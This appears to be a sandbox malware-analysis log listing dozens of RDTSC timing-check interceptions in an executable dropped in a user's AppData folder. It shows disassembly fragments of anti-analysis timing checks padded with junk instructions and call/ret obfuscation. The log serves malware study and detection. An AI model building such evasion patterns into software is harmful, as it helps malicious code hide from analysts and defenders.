Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C393BF second address: C393E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F0E948C9FBEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C86D3B second address: C86D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C86D3F second address: C86D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8AFA1 second address: C8AFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8A07E second address: C8A082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8AFA7 second address: C8B000 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0E94F51A48h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jbe 00007F0E94F51A4Bh 0x00000031 mov edi, 2B6E0E33h 0x00000036 mov edi, dword ptr [ebp+12487F5Eh] 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8905A second address: C89068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8F686 second address: C8F6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F0E94F51A48h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8B22F second address: C8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C90628 second address: C9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F0E94F51A48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007F0E94F51A4Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9165A second address: C9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9165F second address: C91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4349A second address: C434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC3h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C434B7 second address: C434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C434BB second address: C434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F0E948C9FD1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007F0E948C9FBFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A14 second address: C94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A30 second address: C94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A3D second address: C94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C971EE second address: C971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9086C second address: C90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C917DC second address: C917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C90873 second address: C90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C917E1 second address: C91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC8h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9911F second address: C99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0E94F51A4Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C91804 second address: C91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C99148 second address: C991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0E94F51A4Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007F0E94F51A48h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007F0E94F51A51h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C991A9 second address: C991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C91808 second address: C9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0E94F51A4Ch 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F0E94F51A48h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007F0E94F51A4Ch 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007F0E94F51A48h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007F0E94F51A4Ch 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9189B second address: C918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9730C second address: C97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C97310 second address: C97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C97314 second address: C9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9731A second address: C973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E948C9FB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0E948C9FB8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F0E948C9FB8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007F0E948C9FBFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007F0E948C9FBCh 0x0000006d je 00007F0E948C9FBCh 0x00000073 je 00007F0E948C9FB6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007F0E948C9FB8h 0x00000083 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C973BE second address: C973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A51h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C973D3 second address: C973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9E40E second address: C9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9E42C second address: C9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FBEh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E469 second address: C3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E470 second address: C3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E47B second address: C3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA21BD second address: CA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA68FF second address: CA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA9009 second address: CA9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F0E948C9FC6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA9044 second address: CA9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C32AD2 second address: C32AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD183 second address: CAD193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0E94F51A46h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8AC second address: CAD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8B0 second address: CAD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8B4 second address: CAD8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E948C9FBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8CA second address: CAD8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D0 second address: CAD8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D4 second address: CAD8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D8 second address: CAD8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8E6 second address: CAD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3C9D4 second address: C3C9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C813FE second address: C814C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov ecx, edi 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0E94F51A48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub di, DF1Bh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007F0E94F51A56h 0x0000003c mov dword ptr [ebp+1249606Ch], esp 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F0E94F51A48h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or edx, dword ptr [ebp+122D3966h] 0x00000062 cmp dword ptr [ebp+122D3A7Ah], 00000000h 0x00000069 jne 00007F0E94F51B3Ch 0x0000006f mov byte ptr [ebp+122D1CCBh], 00000047h 0x00000076 jc 00007F0E94F51A4Bh 0x0000007c mov edi, 0105AA21h 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007F0E94F51A4Fh 0x0000008b mov dword ptr [ebp+122D1C3Ch], ecx 0x00000091 pop edx 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jne 00007F0E94F51A48h 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81BF9 second address: C81BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81BFF second address: C81C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820A1 second address: C820C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0E948C9FC1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F0E948C9FB6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820C7 second address: C820D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820D6 second address: C820DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C82520 second address: C82524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C82524 second address: C8252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8252A second address: C82534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C825BD second address: C825C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C825C1 second address: C8268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E94F51A5Fh 0x0000000c jmp 00007F0E94F51A59h 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0E94F51A48h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+12482FD4h] 0x00000033 lea eax, dword ptr [ebp+12496058h] 0x00000039 jnl 00007F0E94F51A60h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 jmp 00007F0E94F51A59h 0x00000047 pop eax 0x00000048 jc 00007F0E94F51A48h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F0E94F51A55h 0x00000059 jl 00007F0E94F51A46h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F0E94F51A52h 0x00000067 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8268A second address: C826EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0E948C9FB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D235Ch], edi 0x00000028 lea eax, dword ptr [ebp+12496014h] 0x0000002e mov edx, dword ptr [ebp+122D38F2h] 0x00000034 nop 0x00000035 ja 00007F0E948C9FD3h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C826EA second address: C826EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA897 second address: CBA8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8A0 second address: CBA8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8AA second address: CBA8B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8B4 second address: CBA8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8BC second address: CBA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
